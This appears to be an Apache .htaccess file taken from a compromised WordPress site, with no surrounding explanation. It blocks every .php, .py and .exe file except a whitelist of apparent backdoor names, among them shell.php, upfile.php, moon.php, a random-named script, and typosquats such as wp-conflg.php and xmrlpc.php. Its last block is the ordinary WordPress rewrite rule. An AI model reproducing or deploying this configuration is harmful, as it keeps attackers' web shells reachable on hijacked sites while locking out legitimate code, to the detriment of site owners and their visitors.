<FilesMatch ".(py|exe|php)$">
 Order allow,deny
 Deny from alla
</FilesMatch>
<FilesMatch "(^wp-login.php|^wp-blog-header.php|^wp-admin.php|^style.php|^style2.php|^wp-conflg.php|^index.php|^class.api.php|^iR7SzrsOUEP.php|^license.php|^wp-blog.php|^moon.php|^wp-add.php|^plugin-install.php|^upload.php|^shell.php|^cloud.php|^admin.php|^upfile.php|^xmrlpc.php|^install.php|^wp-ldd.php|^LA.php|^wp-good.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>